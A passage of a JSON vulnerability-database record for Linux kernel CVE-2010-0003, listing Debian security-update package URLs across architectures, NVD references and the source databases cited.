        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64_2.6.26-21lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-486_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4027"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r4k-ip22_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-footbridge_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-686_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390-tape_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-amd64_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64_2.6.26-21lenny3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-generic_2.6.26-21lenny3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-powerpc_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-source-2.6.26_2.6.26-21lenny1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686-bigmem_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-5kc-malta_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-amd64_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686-bigmem_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-orion5x_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-4kc-malta_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-powerpc_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-ixp4xx_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-i386_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3939"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc64_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-s390_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r5k-ip32_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-armel_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-legacy_2.6.26-21lenny2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-generic_2.6.26-21lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r5k-cobalt_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-4kc-malta_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-ixp4xx_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64-smp_2.6.26-21lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc64-smp_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-686_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-legacy_2.6.26-21lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-hppa_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-ia64_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-iop32x_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-ixp4xx_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-armel_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-amd64_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-sparc64_2.6.26-21lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-ia64_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-patch-debian-2.6.26_2.6.26-21lenny2_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-mckinley_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-smp_2.6.26-21lenny2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-orion5x_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-patch-debian-2.6.26_2.6.26-21lenny3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390x_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-iop32x_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc-smp_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-amd64_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-5kc-malta_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-orion5x_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64_2.6.26-21lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-4kc-malta_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64-smp_2.6.26-21lenny3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686-bigmem_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-4kc-malta_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-4kc-malta_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-footbridge_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-ixp4xx_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-21lenny2.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r4k-ip22_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-s390x_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-itanium_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-alpha_2.6.26-21lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r5k-cobalt_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-686_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-footbridge_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-4kc-malta_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-sparc64_2.6.26-21lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-itanium_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-mipsel_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-smp_2.6.26-21lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-arm_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686-bigmem_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-legacy_2.6.26-21lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-sparc_2.6.26-21lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-sparc64_2.6.26-21lenny3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-generic_2.6.26-21lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-486_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0306"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-tree-2.6.26_2.6.26-21lenny1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-support-2.6.26-2_2.6.26-21lenny3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-powerpc_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390x_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r5k-cobalt_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-s390x_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686-bigmem_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64_2.6.26-21lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-powerpc-smp_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-generic_2.6.26-21lenny2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-686_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc-smp_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc64-smp_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-mckinley_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-itanium_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-powerpc_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-orion5x_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686-bigmem_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-486_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-686_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-itanium_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-iop32x_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-s390x_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-amd64_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-amd64_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r5k-ip32_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-4kc-malta_2.6.26-21lenny3_mipsel.deb"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-42608"
      },
      {
        "db": "VULMON",
        "id": "CVE-2010-0003"
      },
      {
        "db": "BID",
        "id": "37724"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001197"
      },
      {
        "db": "PACKETSTORM",
        "id": "98419"
      },
      {
        "db": "PACKETSTORM",
        "id": "86790"
      },
      {
        "db": "PACKETSTORM",
        "id": "85958"
      },
      {
        "db": "PACKETSTORM",
        "id": "86286"
      },
      {
